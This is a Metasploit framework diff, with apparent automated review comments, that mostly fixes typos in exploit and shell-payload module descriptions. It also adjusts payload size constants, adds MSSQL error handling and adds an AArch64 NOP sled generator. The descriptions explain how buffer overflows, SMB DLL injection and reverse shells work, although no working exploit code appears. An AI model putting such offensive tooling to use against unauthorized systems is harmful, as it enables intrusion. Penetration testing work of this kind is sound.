a/modules/exploits/windows/misc/stream_down_bof.rb b/modules/exploits/windows/misc/stream_down_bof.rb index 4183d0abb6..04a6a2f070 100644 --- a/modules/exploits/windows/misc/stream_down_bof.rb +++ b/modules/exploits/windows/misc/stream_down_bof.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'CoCSoft StreamDown 6.8.0 Buffer Overflow', 'Description' => %q{ Stream Down 6.8.0 seh based buffer overflow triggered when processing - the server reponse packet.During the overflow a structured exception + the server response packet. During the overflow a structured exception handler is overwritten. }, 'Author' => 'Fady Mohamed Osman ', 
diff --git a/modules/exploits/windows/misc/windows_rsh.rb b/modules/exploits/windows/misc/windows_rsh.rb index 8e0b046f6e..e98c90f778 100644 --- a/modules/exploits/windows/misc/windows_rsh.rb +++ b/modules/exploits/windows/misc/windows_rsh.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Windows RSH Daemon Buffer Overflow', 'Description' => %q{ - This module exploits a vulnerabliltiy in Windows RSH daemon 1.8. + This module exploits a vulnerability in Windows RSH daemon 1.8. The vulnerability is due to a failure to check for the length of input sent to the RSH server. A CPORT of 512 -> 1023 must be configured for the exploit to be successful. diff --git a/modules/exploits/windows/misc/wireshark_lua.rb b/modules/exploits/windows/misc/wireshark_lua.rb index 2a577b4a44..7e3a0fbf07 100644 --- a/modules/exploits/windows/misc/wireshark_lua.rb +++ b/modules/exploits/windows/misc/wireshark_lua.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => "Wireshark console.lua Pre-Loading Script Execution", 'Description' => %q{ - This modules exploits a vulnerability in Wireshark 1.6 or less. When opening a + This module exploits a vulnerability in Wireshark 1.6 or less. When opening a pcap file, Wireshark will actually check if there's a 'console.lua' file in the same directory, and then parse/execute the script if found. Versions affected by this vulnerability: 1.6.0 to 1.6.1, 1.4.0 to 1.4.8 diff --git a/modules/exploits/windows/misc/wireshark_packet_dect.rb b/modules/exploits/windows/misc/wireshark_packet_dect.rb index 7ce4a89a34..89a0351356 100644 --- a/modules/exploits/windows/misc/wireshark_packet_dect.rb +++ b/modules/exploits/windows/misc/wireshark_packet_dect.rb 
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Wireshark packet-dect.c Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Wireshark <= 1.4.4 - by sending an malicious packet. + by sending a malicious packet. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/motorola/timbuktu_fileupload.rb b/modules/exploits/windows/motorola/timbuktu_fileupload.rb index 00c492eef1..0de5bdcb6a 100644 --- a/modules/exploits/windows/motorola/timbuktu_fileupload.rb +++ b/modules/exploits/windows/motorola/timbuktu_fileupload.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Timbuktu Pro Directory Traversal/File Upload', 'Description' => %q{ - This module exploits a directory traversal vulnerablity in Motorola's + This module exploits a directory traversal vulnerability in Motorola's Timbuktu Pro for Windows 8.6.5. }, 'Author' => [ 'MC' ], diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb index 45793d5786..5420a0e997 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb @@ -27,7 +27,7 @@ class MetasploitModule < Msf::Exploit::Remote This exploit smashes several pointers, as shown below. 1. pointer to a 32-bit value that is set to 0 - 2. pointer to a 32-bit value that is set to a length influcenced by the buffer + 2. pointer to a 32-bit value that is set to a length influenced by the buffer length. 3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000, this value is referenced with a displacement of 0x38. For MSSQL 2005, the diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb index 409ef5346e..e786810528 100644 
--- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb @@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote This exploit smashes several pointers, as shown below. 1. pointer to a 32-bit value that is set to 0 - 2. pointer to a 32-bit value that is set to a length influcenced by the buffer + 2. pointer to a 32-bit value that is set to a length influenced by the buffer length. 3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000, this value is referenced with a displacement of 0x38. For MSSQL 2005, the diff --git a/modules/exploits/windows/mssql/mssql_clr_payload.rb b/modules/exploits/windows/mssql/mssql_clr_payload.rb index b0dd4167ef..43efd74621 100644 --- a/modules/exploits/windows/mssql/mssql_clr_payload.rb +++ b/modules/exploits/windows/mssql/mssql_clr_payload.rb @@ -96,7 +96,13 @@ class MetasploitModule < Msf::Exploit::Remote end def set_trustworthy(on) - mssql_query("ALTER DATABASE [#{datastore['DATABASE']}] SET TRUSTWORTHY #{on ? 'ON' : 'OFF'}", false) + result = mssql_query("ALTER DATABASE [#{datastore['DATABASE']}] SET TRUSTWORTHY #{on ? 'ON' : 'OFF'}", false) + unless result[:errors].empty? + result[:errors].each do |err| + vprint_error(err) + end + fail_with(Failure::Unknown, "Failed to change Trustworthy setting") + end end def is_trustworthy @@ -112,7 +118,13 @@ RECONFIGURE; EXEC sp_configure 'clr enabled', #{enable ? 1 : 0}; RECONFIGURE; ^ - mssql_query(query, false) + result = mssql_query(query, false) + unless result[:errors].empty? + result[:errors].each do |err| + vprint_error(err) + end + fail_with(Failure::Unknown, "Failed to change CLR setting") + end end def is_clr_enabled diff --git a/modules/exploits/windows/mssql/mssql_linkcrawler.rb b/modules/exploits/windows/mssql/mssql_linkcrawler.rb index 9fa775f868..0b019721b1 100644 --- a/modules/exploits/windows/mssql/mssql_linkcrawler.rb 
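Review bot: The error-reporting block added after `mssql_query` in set_trustworthy is repeated verbatim in the second hunk of this file (the `clr enabled` query at @@ -112), differing only in the message; a small private helper would keep the two in step, as sketched below. Both hunks index `result[:errors]` directly, so if `mssql_query` can return nil or a result without `:errors` on a connection failure the new code raises NoMethodError before reaching `fail_with` — worth a `result.nil? ||` guard if that return is possible, which the hunk does not show. The method enclosing the second hunk begins outside it.
```ruby
  # Report every error returned by an mssql_query call and abort the module.
  def fail_on_query_errors(result, message)
    return if result[:errors].empty?
    result[:errors].each { |err| vprint_error(err) }
    fail_with(Failure::Unknown, message)
  end

  def set_trustworthy(on)
    result = mssql_query("ALTER DATABASE [#{datastore['DATABASE']}] SET TRUSTWORTHY #{on ? 'ON' : 'OFF'}", false)
    fail_on_query_errors(result, "Failed to change Trustworthy setting")
  end
```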
+++ b/modules/exploits/windows/mssql/mssql_linkcrawler.rb @@ -25,7 +25,7 @@ class MetasploitModule < Msf::Exploit::Remote up a exploit/multi/handler to run in the background as a job to support multiple incoming shells. - If you are interested in deploying payloads to spefic servers this module also + If you are interested in deploying payloads to specific servers this module also supports that functionality via the "DEPLOYLIST" option. Currently, the module is capable of delivering payloads to both 32bit and 64bit diff --git a/modules/exploits/windows/mssql/mssql_payload.rb b/modules/exploits/windows/mssql/mssql_payload.rb index a11b0f6b52..4bb86ac3d1 100644 --- a/modules/exploits/windows/mssql/mssql_payload.rb +++ b/modules/exploits/windows/mssql/mssql_payload.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote the "xp_cmdshell" stored procedure. Currently, three delivery methods are supported. First, the original method uses Windows 'debug.com'. File size restrictions are - avoidied by incorporating the debug bypass method presented by SecureStat at + avoided by incorporating the debug bypass method presented by SecureStat at Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems. A second method takes advantage of the Command Stager subsystem. This allows using diff --git a/modules/exploits/windows/mssql/mssql_payload_sqli.rb b/modules/exploits/windows/mssql/mssql_payload_sqli.rb index ba54836cb3..1715ff15b2 100644 --- a/modules/exploits/windows/mssql/mssql_payload_sqli.rb +++ b/modules/exploits/windows/mssql/mssql_payload_sqli.rb 
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote Currently, three delivery methods are supported. First, the original method uses Windows 'debug.com'. File size restrictions are - avoidied by incorporating the debug bypass method presented by SecureStat at + avoided by incorporating the debug bypass method presented by SecureStat at Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems. A second method takes advantage of the Command Stager subsystem. This allows using diff --git a/modules/exploits/windows/oracle/tns_arguments.rb b/modules/exploits/windows/oracle/tns_arguments.rb index 081d5c44ef..15353554dc 100644 --- a/modules/exploits/windows/oracle/tns_arguments.rb +++ b/modules/exploits/windows/oracle/tns_arguments.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Oracle 8i. When - sending a specially crafted packet containing a overly long + sending a specially crafted packet containing an overly long ARGUMENTS string to the TNS service, an attacker may be able to execute arbitrary code. }, diff --git a/modules/exploits/windows/scada/daq_factory_bof.rb b/modules/exploits/windows/scada/daq_factory_bof.rb index 2b1173ceed..ec883aed77 100644 --- a/modules/exploits/windows/scada/daq_factory_bof.rb +++ b/modules/exploits/windows/scada/daq_factory_bof.rb 
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'DaqFactory HMI NETB Request Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Azeotech's DaqFactory - product. The specfic vulnerability is triggered when sending a specially crafted + product. The specific vulnerability is triggered when sending a specially crafted 'NETB' request to port 20034. Exploitation of this vulnerability may take a few seconds due to the use of egghunter. This vulnerability was one of the 14 releases discovered by researcher Luigi Auriemma. diff --git a/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb b/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb index fce4e3a57f..cfa6ca1f24 100644 --- a/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb +++ b/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module abuses the gefebt.exe component in GE Proficy CIMPLICITY, reachable through the CIMPLICIY CimWebServer. The vulnerable component allows to execute remote BCL files in - shared resources. An attacker can abuse this behaviour to execute a malicious BCL and + shared resources. An attacker can abuse this behavior to execute a malicious BCL and drop an arbitrary EXE. The last one can be executed remotely through the WebView server. This module has been tested successfully in GE Proficy CIMPLICITY 7.5 with the embedded CimWebServer. This module starts a WebDAV server to provide the malicious BCL files. If diff --git a/modules/exploits/windows/scada/indusoft_webstudio_exec.rb b/modules/exploits/windows/scada/indusoft_webstudio_exec.rb index 7ad8893628..5ce73ca6c1 100644 --- a/modules/exploits/windows/scada/indusoft_webstudio_exec.rb +++ b/modules/exploits/windows/scada/indusoft_webstudio_exec.rb 
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
 Web Studio Remote Agent, that allows a remote attacker to write arbitrary files to the filesystem, by abusing the functions provided by the software.
- The module uses uses the Windows Management Instrumentation service to execute an
+ The module uses the Windows Management Instrumentation service to execute an
 arbitrary payload on vulnerable installations of InduSoft Web Studio on Windows pre Vista. It has been successfully tested on InduSoft Web Studio 6.1 SP6 over Windows XP SP3 and Windows 2003 SP2.
diff --git a/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb b/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb
index dd1f914955..c611b2679f 100644
--- a/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb
+++ b/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
 SCADA Server 2.1 and below. By supplying a specially crafted On_FC_BINFILE_FCS_*FILE packet via port 910, RealWin will try to create a file (which would be saved to C:\Program Files\DATAC\Real Win\RW-version\filename) by first copying the user-
- supplied filename with a inline memcpy routine without proper bounds checking, which
+ supplied filename with an inline memcpy routine without proper bounds checking, which
 results a stack-based buffer overflow, allowing arbitrary remote code execution. Tested version: 2.0 (Build 6.1.8.10)
diff --git a/modules/exploits/windows/scada/scadapro_cmdexe.rb b/modules/exploits/windows/scada/scadapro_cmdexe.rb
index 49b8242736..7af6fc5c3c 100644
--- a/modules/exploits/windows/scada/scadapro_cmdexe.rb
+++ b/modules/exploits/windows/scada/scadapro_cmdexe.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
 super(update_info(info,
 'Name' => 'Measuresoft ScadaPro Remote Command Execution',
 'Description' => %q{
- This module allows remote attackers to execute arbitray commands on the
+ This module allows remote attackers to execute arbitrary commands on the
 affected system by abusing via Directory Traversal attack when using the 'xf' command (execute function). An attacker can execute system() from msvcrt.dll to upload a backdoor and gain remote code execution. This
diff --git a/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb b/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb
index bd597f7009..355b633083 100644
--- a/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb
+++ b/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb
@@ -12,9 +12,9 @@ class MetasploitModule < Msf::Exploit::Remote
 super(update_info(info,
 'Name' => 'Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow',
 'Description' => %q{
- This module exploits an stack based buffer overflow on Yokogawa CS3000. The vulnerability
+ This module exploits a stack based buffer overflow on Yokogawa CS3000. The vulnerability
 exists in the service BKFSim_vhfd.exe when using malicious user-controlled data to create
- logs using functions like vsprintf and memcpy in a insecure way. This module has been
+ logs using functions like vsprintf and memcpy in an insecure way. This module has been
 tested successfully on Yokogawa Centum CS3000 R3.08.50 over Windows XP SP3.
 },
 'Author' =>
diff --git a/modules/exploits/windows/smb/generic_smb_dll_injection.rb b/modules/exploits/windows/smb/generic_smb_dll_injection.rb
index 4f0bab3fdf..6a03a0623f 100644
--- a/modules/exploits/windows/smb/generic_smb_dll_injection.rb
+++ b/modules/exploits/windows/smb/generic_smb_dll_injection.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'Name' => 'Generic DLL Injection From Shared Resource',
 'Description' => %q{
 This is a general-purpose module for exploiting conditions where a DLL can be loaded
- from an specified SMB share. This module serves payloads as DLLs over an SMB service.
+ from a specified SMB share. This module serves payloads as DLLs over an SMB service.
 },
 'Author' =>
 [
diff --git a/modules/exploits/windows/smb/ms04_007_killbill.rb b/modules/exploits/windows/smb/ms04_007_killbill.rb
index 58121746a1..df5a44880f 100644
--- a/modules/exploits/windows/smb/ms04_007_killbill.rb
+++ b/modules/exploits/windows/smb/ms04_007_killbill.rb
@@ -22,14 +22,14 @@ class MetasploitModule < Msf::Exploit::Remote
 You are only allowed one attempt with this vulnerability. If the payload fails to execute, the LSASS system service will crash and the target system will automatically reboot itself
- in 60 seconds. If the payload succeeeds, the system will no
+ in 60 seconds. If the payload succeeds, the system will no
 longer be able to process authentication requests, denying all attempts to login through SMB or at the console. A reboot is required to restore proper functioning of an exploited system. This exploit has been successfully tested with the win32/*/reverse_tcp
- payloads, however a few problems were encounted when using the
+ payloads, however a few problems were encountered when using the
 equivalent bind payloads. Your mileage may vary.
 },
diff --git a/modules/exploits/windows/smb/ms06_070_wkssvc.rb b/modules/exploits/windows/smb/ms06_070_wkssvc.rb
index 7c57f771fa..229f3f6250 100644
--- a/modules/exploits/windows/smb/ms06_070_wkssvc.rb
+++ b/modules/exploits/windows/smb/ms06_070_wkssvc.rb
@@ -17,9 +17,9 @@ class MetasploitModule < Msf::Exploit::Remote
 This module exploits a stack buffer overflow in the NetApi32 NetpManageIPCConnect function using the Workstation service in Windows 2000 SP4 and Windows XP SP2.
- In order to exploit this vulnerability, you must specify a the name of a
+ In order to exploit this vulnerability, you must specify the name of a
 valid Windows DOMAIN. It may be possible to satisfy this condition by using
- a custom dns and ldap setup, however that method is not covered here.
+ a custom DNS and LDAP setup, however that method is not covered here.
 Although Windows XP SP2 is vulnerable, Microsoft reports that Administrator credentials are required to reach the vulnerable code. Windows XP SP1 only
diff --git a/modules/exploits/windows/smb/ms17_010_eternalblue.rb b/modules/exploits/windows/smb/ms17_010_eternalblue.rb
index 31e4970250..f5d6921f73 100644
--- a/modules/exploits/windows/smb/ms17_010_eternalblue.rb
+++ b/modules/exploits/windows/smb/ms17_010_eternalblue.rb
@@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote
 and need a cool down period before the shells rain in again. The module will attempt to use Anonymous login, by default, to authenticate to perform the
- exploit. If the user supplies credentials in the SMBUser,SMBPass, and SMBDomain options it will use
+ exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use
 those instead. On some systems, this module may cause system instability and crashes, such as a BSOD or
diff --git a/modules/nops/aarch64/simple.rb b/modules/nops/aarch64/simple.rb
new file mode 100644
index 0000000000..ae29aa5c47
--- /dev/null
+++ b/modules/nops/aarch64/simple.rb
@@ -0,0 +1,44 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+###
+#
+# SingleByte
+# ----------
+#
+# This class implements simple NOP generator for AARCH64
+#
+###
+class MetasploitModule < Msf::Nop
+
+ def initialize
+ super(
+ 'Name' => 'Simple',
+ 'Alias' => 'armle_simple',
+ 'Description' => 'Simple NOP generator',
+ 'License' => MSF_LICENSE,
+ 'Arch' => ARCH_AARCH64)
+ register_advanced_options(
+ [
+ OptBool.new('RandomNops', [ false, "Generate a random NOP sled", true ])
+ ])
+ end
+
+ def generate_sled(length, opts)
+ random = opts['Random'] || datastore['RandomNops']
+ nops = [
+ 0xd503201f, # nop
+ 0xaa0103e1, # mov x1, x1
+ 0xaa0203e2, # mov x2, x2
+ 0x2a0303e3, # mov w3, w3
+ 0x2a0403e4, # mov w4, w4
+ ]
+ if random
+ return ([nops[rand(nops.length)]].pack("V*") * (length/4))
+ end
+ return ([nops[0]].pack("V*") * (length/4))
+ end
+end
+
diff --git a/modules/payloads/singles/cmd/mainframe/reverse_shell_jcl.rb b/modules/payloads/singles/cmd/mainframe/reverse_shell_jcl.rb
index 32b3826344..d457562c72 100644
--- a/modules/payloads/singles/cmd/mainframe/reverse_shell_jcl.rb
+++ b/modules/payloads/singles/cmd/mainframe/reverse_shell_jcl.rb
@@ -22,7 +22,7 @@ module MetasploitModule
 super(merge_info(info,
 'Name' => 'Z/OS (MVS) Command Shell, Reverse TCP',
 'Description' => 'Provide JCL which creates a reverse shell
- This implmentation does not include ebcdic character translation,
+ This implementation does not include ebcdic character translation,
 so a client with translation capabilities is required. MSF handles this automatically.',
 'Author' => 'Bigendian Smalls',
diff --git a/modules/payloads/singles/cmd/unix/bind_nodejs.rb b/modules/payloads/singles/cmd/unix/bind_nodejs.rb
index 799a3ebf59..20da3cc306 100644
--- a/modules/payloads/singles/cmd/unix/bind_nodejs.rb
+++ b/modules/payloads/singles/cmd/unix/bind_nodejs.rb
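Review bot: In the new simple.rb, `generate_sled` builds the sled as `length/4` copies of a 4-byte word, so a `length` that is not a multiple of 4 returns a sled up to three bytes shorter than requested; if the Msf::Nop caller expects exactly `length` bytes (not visible here), that should be validated or at least stated in a comment such as `# AArch64 instructions are fixed 4-byte words; length is rounded down to a multiple of 4`. The header block titled `SingleByte` and the `'Alias' => 'armle_simple'` look carried over from the ARM LE generator: this class emits 4-byte words, and the alias should name this architecture (for example `'Alias' => 'aarch64_simple'`) so it does not presumably duplicate the armle module's alias. The `random` branch also selects one entry of `nops` once and repeats it for the whole sled, so the `RandomNops` option text "Generate a random NOP sled" promises more variation than the code delivers; the option description or the code should be brought into line. The two explicit `return (...)` statements could be one expression, `[random ? nops.sample : nops.first].pack("V*") * (length / 4)`, which keeps the behaviour and drops the redundant parentheses.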
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 module MetasploitModule
- CachedSize = 1843
+ CachedSize = 2351
 include Msf::Payload::Single
 include Msf::Payload::NodeJS
diff --git a/modules/payloads/singles/cmd/unix/bind_r.rb b/modules/payloads/singles/cmd/unix/bind_r.rb
index 7d459efd63..7c548c31c7 100644
--- a/modules/payloads/singles/cmd/unix/bind_r.rb
+++ b/modules/payloads/singles/cmd/unix/bind_r.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 module MetasploitModule
- CachedSize = 516
+ CachedSize = 132
 include Msf::Payload::Single
 include Msf::Payload::R
@@ -27,7 +27,7 @@ module MetasploitModule
 'Handler' => Msf::Handler::BindTcp,
 'Session' => Msf::Sessions::CommandShell,
 'PayloadType' => 'cmd',
- 'RequiredCmd' => 'ruby',
+ 'RequiredCmd' => 'R',
 'Payload' => { 'Offsets' => {}, 'Payload' => '' }
 ))
 end
diff --git a/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb
index cf22b14f24..5156e73ead 100644
--- a/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb
@@ -17,7 +17,7 @@ module MetasploitModule
 def initialize(info = {})
 super(merge_info(info,
 'Name' => 'Unix Command Shell, Reverse TCP (via ncat)',
- 'Description' => 'Creates an interactive shell via ncat, utilising ssl mode',
+ 'Description' => 'Creates an interactive shell via ncat, utilizing ssl mode',
 'Author' => 'C_Sto',
 'License' => MSF_LICENSE,
 'Platform' => 'unix',
diff --git a/modules/payloads/singles/cmd/unix/reverse_nodejs.rb b/modules/payloads/singles/cmd/unix/reverse_nodejs.rb
index 78af919c31..3149942c66 100644
--- a/modules/payloads/singles/cmd/unix/reverse_nodejs.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_nodejs.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 module MetasploitModule
- CachedSize = 1971
+ CachedSize = 2423
 include Msf::Payload::Single
 include Msf::Payload::NodeJS
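Review bot: The second bind_r.rb hunk switches `'RequiredCmd'` from `'ruby'` to `'R'` but shows only that line, while the sibling reverse_r.rb in this same commit also moves `'Platform'` to `'unix'` and `'Arch'` to `ARCH_CMD`; bind_r's corresponding `'Platform'` and `'Arch'` entries are outside the hunk, so it is worth confirming they already carry the `unix`/`ARCH_CMD` pair rather than an older value, or the `cmd` payload type and the required `R` binary will not line up. The `initialize` body this hunk belongs to starts before the hunk.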
diff --git a/modules/payloads/singles/cmd/unix/reverse_r.rb b/modules/payloads/singles/cmd/unix/reverse_r.rb
index 7a87703e65..41dd7aa025 100644
--- a/modules/payloads/singles/cmd/unix/reverse_r.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_r.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 module MetasploitModule
- CachedSize = 516
+ CachedSize = 157
 include Msf::Payload::Single
 include Msf::Payload::R
@@ -22,11 +22,12 @@ module MetasploitModule
 'Description' => 'Connect back and create a command shell via R',
 'Author' => [ 'RageLtMan' ],
 'License' => MSF_LICENSE,
- 'Platform' => 'r',
- 'Arch' => ARCH_R,
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
 'Handler' => Msf::Handler::ReverseTcp,
 'Session' => Msf::Sessions::CommandShell,
- 'PayloadType' => 'r',
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'R',
 'Payload' => { 'Offsets' => {}, 'Payload' => '' }
 ))
 end
diff --git a/modules/payloads/singles/firefox/exec.rb b/modules/payloads/singles/firefox/exec.rb
index bcfe43ccb2..002d07c520 100644
--- a/modules/payloads/singles/firefox/exec.rb
+++ b/modules/payloads/singles/firefox/exec.rb
@@ -14,7 +14,7 @@ module MetasploitModule
 super(merge_info(info,
 'Name' => 'Firefox XPCOM Execute Command',
 'Description' => %Q|
- This module runs a shell command on the target OS withough touching the disk.
+ This module runs a shell command on the target OS without touching the disk.
 On Windows, this command will flash the command prompt momentarily. This can be avoided by setting WSCRIPT to true, which drops a jscript "launcher" to disk that hides the prompt.
diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb
index 2143baed9d..25b4b456e2 100644
--- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux'
 module MetasploitModule
- CachedSize = 675048
+ CachedSize = 675112
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb
index a8b830d7b1..7f493ef8e9 100644
--- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux'
 module MetasploitModule
- CachedSize = 675048
+ CachedSize = 675112
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb
index 12a24a3808..4c1b96f0db 100644
--- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux'
 module MetasploitModule
- CachedSize = 675048
+ CachedSize = 675112
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb
index 9f288cbb42..4fff3cf0a5 100644
--- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux'
 module MetasploitModule
- CachedSize = 668360
+ CachedSize = 668392
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb
index a6892795d8..d1e889a621 100644
--- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux'
 module MetasploitModule
- CachedSize = 668360
+ CachedSize = 668392
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb
index b462a421f5..7ac0601213 100644
--- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux'
 module MetasploitModule
- CachedSize = 668360
+ CachedSize = 668392
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb
index c5a23244d4..5da3516adf 100644
--- a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux'
 module MetasploitModule
- CachedSize = 666552
+ CachedSize = 666984
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb
index 7cec5d5b2d..976d22b3d0 100644
--- a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux'
 module MetasploitModule
- CachedSize = 666552
+ CachedSize = 666984
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb
index 32f1797ad9..866d3a0e5c 100644
--- a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux'
 module MetasploitModule
- CachedSize = 666552
+ CachedSize = 666984
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb
index 12bd32a0c2..8e5a81046a 100644
--- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux'
 module MetasploitModule
- CachedSize = 1059224
+ CachedSize = 1059368
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
